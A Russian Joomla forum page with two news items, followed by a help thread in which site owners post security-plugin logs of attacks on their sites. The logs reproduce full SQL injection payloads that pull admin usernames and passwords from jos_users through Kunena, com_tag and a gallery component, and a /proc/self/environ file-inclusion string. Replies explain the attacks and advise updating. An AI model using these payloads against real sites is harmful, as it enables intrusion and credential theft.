Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 268448 Просмотров
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Вариант один. Вычистить все и обновится до последних версий расширений и Joomla. Поменять пароли.
И не забывать систематически бэкапы делать!
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Биржи ссылок и доров тоже вроде нету.
Пароли поменял, поставил двойную авторизацию в админку.
Вспомнил, что в это время пришло три письма от плагина Marcos interceptor, уже видимо после того как были залиты левые файлы. Там была попытка взлома двух компонентов, которых у меня нету и одна инъекция в ком.контент.
Тогда был не возле компа - не мог детально проверить сайты.

По JCE вопрос - в последних версиях уязвимостей нету? Или каким вы пользуетесь редактором?
в последних версиях, в паблике нету! а что с другии компонентами? чистые? не плохой маневр был бы если на ошибки прописать функцию которая вела бы логи на староннем сервере и по мере необходимости выссылала отчет на почту раз в неделю для профилактики)
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Из других компонентов:
1-ый сайт: sh404sef(последняя для 1.5), фока галлерея(последняя), акеба бекап. Модулей левых нету
2-ой сайт: sh404SEF, VirtueMart, jrecash, acymailing, JCE редактор, акеба бекап.

По поводу прописать функцию - сколько это будет стоить? Куда отсылать логи будет, вам? И в  чем преимущество, плагин марко тоже сразу высылает отчет?

На счет плагина марко не знаю, в компонентах фотоголерей знаю что есть скули, также и в VirtueMart, об остальных не знаю, если любопытство глумит то надо аналезировать код! на счет логов, куда угодно... на вашь сервер, вам в почту еще куда либо)
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
VirtueMart, JCE какой версии?
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
VirtueMart 1.1.14, JCE последняя версия с оффсайта, еще плагин - core design captcha plugin, PhocaGallery тоже последняя с оффсайта.
VirtueMart старенький, но там полезных хаков по магазину много, если обновлять слетит все к чертям.
Не обезательно обновлять компонент, можно просто в коде закрыть дыры!
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Marco прислал информацию - пытались сегодня вскрыть сайт на Joomla 1.5:

** Union Select [GET:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [GET:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Union Select [REQUEST:tag] => 999999.9\' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a** Table name in url [REQUEST:tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a**PAGE / SERVER INFO*REMOTE_ADDR :46.37.166.22*HTTP_USER_AGENT :Mozilla/5.0*REQUEST_METHOD :GET*QUERY_STRING :option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a** SUPERGLOBALS DUMP (sanitized)*$_GET DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a*$_POST DUMP*$_COOKIE DUMP*$_REQUEST DUMP -[option] => com_tag -[task] => tag -[lang] => es -[tag] => 999999.9\' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Это ботнет, стучал и к  клиентам сегодня. Если у вас нет этого расширения то боятся нечего.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Это старая уязвимость, но на сегодняшние день очень акктуальна для необнавленных компонентов.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
Логи Marcos

** Local File Inclusion [GET:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00
** Local File Inclusion [REQUEST:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00

**PAGE / SERVER INFO


*REMOTE_ADDR :
216.70.90.155

*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ccnewsletter
 -[controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Тоже уязвимость от 2010 года. Обновляйте сайты, чтобы такие приколы не проходили. 100% этого компонента у вас нет.
*

lifter

  • Осваиваюсь на форуме
  • 39
  • 6 / 0
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
Вчера первый раз пришло письмо Marco's interceptor warning, из него мне мало что понятно, поэтому поначитавшись тут ужастиков решил уточнить у спецов, не опасноли это и что это вообще и какие меры предпринимать?

** Union Select [GET:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [GET:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Union Select [REQUEST:tag] => 999999.9' union all select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a
** Table name in url [REQUEST:tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from jos_users-- a

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_tag&task=tag&lang=es&tag=999999.9'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users--+a



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_tag
 -[task] => tag
 -[lang] => es
 -[tag] => 999999.9' -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e) from -- users-- a
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
com_tag у вас есть? пытаются взломать вас через него SQL-инъекцией нехорошие люди.
такого com_tag у меня нет
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
люди добрые, почитав данную тему, про хулиганов с SQL-шприцами я уже понял, хотелось бы поподробнее...
« Последнее редактирование: 21.03.2013, 23:44:40 от Alex Kop »
*

ven-til

  • Захожу иногда
  • 157
  • 3 / 0
привет.
сегодня у себя в Перенаправлениях заметил ссылку:
Спойлер
[свернуть]

jos_users - понятно, а что все остальное значит?
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
такого com_tag у меня нет

Тогда не о чем беспокоиться.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
jos_users - понятно, а что все остальное значит?

Ерунда, если com_tag нет. Не обращайте внимания.
*

ven-til

  • Захожу иногда
  • 157
  • 3 / 0
Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
привет.
сегодня у себя в Перенаправлениях заметил ссылку:
Спойлер
[свернуть]

jos_users - понятно, а что все остальное значит?

А все остальное, это запрос к вашей MySQL db, в результате которой взломщику место вашего контента на сайте вывидется логин и пароль от админки!

Это пока ерунда.
Подозреваю в этих нехороших действиях одного необразованного клоуна.
Ранее он пытался получить доступ к моей админке решив что сайт у меня на WP.
Вот список его попыток:
wp-admin
wp-login.php
wp-trackback.php
bitrix/admin/index.php?lang=en
admin/login.php
blog/wp-trackback.php 
Да))) там походу действительно не образованный клоун был))
*

assaru

  • Давно я тут
  • 763
  • 88 / 1
Сегодня этот же, но уже Kunena опрашивается...
Спойлер
[свернуть]
Проблему можно решить и по скрину и по эмоциям, счет на оплату через ЛС (с) Nobody
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Ниже попытка взлома Поиска. Насколько это страшно?
« Последнее редактирование: 22.03.2013, 10:55:45 от Zoblin »
*

Zoblin

  • Захожу иногда
  • 73
  • 0 / 0
Сегодня сразу две атаки:

** Union Select [GET:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


И еще одна:

** Union Select [GET:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [GET:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Union Select [REQUEST:gallery] => -1 union select 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--
** Table name in url [REQUEST:gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from jos_users--

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users--



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_ignitegallery
 -[task] => view
 -[gallery] => -1 -- 1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10 from -- users--

Прокомментируйте, пожалуйста! Спасибо!
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
у меня тоже сегодня в 9.07
** Union Select [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => ' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

И на этот раз com_kunena  у меня есть
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
У ботов весна... Kunena обновить надо до 2.0.4 если старая стоит.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3181
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 3470
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2767
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1047
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2433
Последний ответ 03.11.2020, 17:36:03
от Cedars